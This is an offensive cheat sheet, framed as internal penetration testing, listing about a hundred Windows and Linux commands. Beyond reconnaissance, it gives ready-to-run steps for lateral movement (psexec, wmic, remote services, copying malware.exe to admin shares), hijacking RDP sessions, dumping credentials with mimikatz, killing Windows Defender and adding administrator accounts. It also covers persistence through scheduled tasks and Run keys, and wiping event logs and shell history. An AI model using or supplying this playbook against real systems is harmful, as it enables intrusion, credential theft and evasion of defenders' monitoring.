100 Essential Commands for Internal Network Penetration Testing

Windows internal information gathering

whoami

– view current logged‑in user whoami /priv – view current user privileges (privilege escalation clues) whoami /all – view full SID, group and privilege information hostname – view host name systeminfo – system version, patches, architecture, domain info systeminfo | findstr KB – quickly list installed patches ipconfig /all – NIC, IP, gateway, DNS, domain membership ipconfig /displaydns – view local DNS cache ipconfig /flushdns – clear DNS cache arp -a – view ARP table, discover live hosts on the same subnet route print – view routing table, assess multiple NICs and internal subnets netstat -ano – view all ports, connections and owning PID netstat -ano | findstr ":3389" – filter Remote Desktop port status net user – list local users net localgroup – list local groups net localgroup administrators – view local administrators net config workstation – quickly determine domain membership ver – quick view of OS version wmic os get caption – clean output of OS version wmic qfe list – list patches (cleaner than systeminfo)

Windows internal network scanning and port discovery

ping -n 1 -w 100 192.168.1.1

– single ping for quick host liveness

for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.1.%i | findstr TTL

– native C‑class sweep tracert -d <targetIP> – traceroute without DNS resolution (faster) net view – view hosts in the same workgroup net view /domain – view domains present in the internal network net share – view local shared resources dir \\127.0.0.1\C$ – test default administrative share (C$) sc query – list all running services sc query winrm – check WinRM remote management status sc query termservice – check Remote Desktop service status tasklist /svc – processes with associated service names tasklist | findstr lsass.exe – locate LSASS PID

Windows lateral movement and remote execution

net use \\<IP>\ipc$ "password" /user:username

– connect to IPC$ share net use \\<IP>\C$ /user:DOMAIN\username password – mount remote C: drive copy malware.exe \\<IP>\C$\Windows\Temp – upload file to remote host psexec \\<IP> -u username -p password cmd – obtain remote shell (requires admin)

wmic /node:<IP> /user:username /password:password process call create "cmd.exe"

– remote WMI execution

sc \\<IP> create servicename binPath= "cmd.exe /c <command>"

– create remote service to run command

schtasks /create /s <IP> /u username /p password /tn taskname /tr <command> /sc once /st 00:00

– schedule remote task execution qwinsta /server:<IP> – view remote login sessions tscon <sessionID> /dest:console /server:<IP> – hijack remote desktop session reg query \\<IP>\HKLM\SYSTEM – read remote registry net start /domain – view services started in the domain winrm quickconfig – quickly enable WinRM on the local machine Enter-PSSession -Computer <IP> – PowerShell remote connection

Windows privilege escalation and credential harvesting

wmic product get name,version

– list installed software (search for escalation binaries) wmic service get name,startname – view service start accounts icacls C:\windows\system32 – view directory ACLs secedit /export /cfg C:\sec.cfg – export local security policy net user username password /add – add local user net localgroup administrators username /add – add user to local Administrators group net localgroup "Remote Desktop Users" username /add – grant RDP rights

reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

– enable RDP (3389) taskkill /f /im msmpeng.exe – force‑stop Windows Defender (requires admin)

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

– dump credentials from memory (authorized use only)

Windows domain environment commands

net time /domain

– get domain controller time, locate DC IP nltest /dclist:domainname – list domain controllers nltest /dsgetdc:domainname – retrieve domain controller details net user /domain – list all domain users net group /domain – list all domain groups net group "Domain Admins" /domain – list domain admins net group "Enterprise Admins" /domain – list enterprise admins net group "Domain Computers" /domain – list domain computers dsquery user – query domain users (AD environments) dsquery computer – query domain computers dsquery group – query domain groups set user – quickly view USERDOMAIN to determine domain context gpresult /r – view applied group policy wmic ntdomain list full – retrieve full domain information nslookup -type=SRV _ldap._tcp – locate LDAP service / domain controller

Linux internal network commands

id

– current UID/GID/privileges whoami – current user uname -a – kernel version (escalation clue) cat /etc/issue – OS version cat /etc/passwd – local users cat /etc/group – local groups ifconfig or ip a – network interface IPs route -n – routing table arp -a – ARP cache netstat -antlp – listening ports and owning processes ps -ef – process list find / -perm -u=s -type f 2>/dev/null – locate SUID binaries for privilege escalation sudo -l – view sudo permissions cat /etc/shadow – password hashes (requires root) ssh user@IP – lateral movement via SSH

General internal operations: file search, cleanup, persistence

dir /s /b c:\*.txt | findstr password

– Windows search for files containing passwords find / -name "*.conf" -type f 2>/dev/null – Linux search for configuration files find / -name "*.bak" -o -name "*.old" – locate backup files del /f /s /q %windir%\prefetch* – clear prefetch cache del /f /s /q "%userprofile%\Recent*" – clear recent file history cls – clear CMD screen history -c – clear Bash history echo > /var/log/wtmp – clear Linux login logs echo > /var/log/secure – clear SSH logs schtasks /create /tn name /tr path /sc onstart /ru system – create auto‑run task for persistence reg add HKLM...\Run /v name /t REG_SZ /d path /f – registry Run key persistence at 12:00 shutdown /r /t 0 – schedule immediate reboot (testing) wevtutil el – list Windows event logs wevtutil cl System – clear System log wevtutil cl Security – clear Security log

Source: HACK之道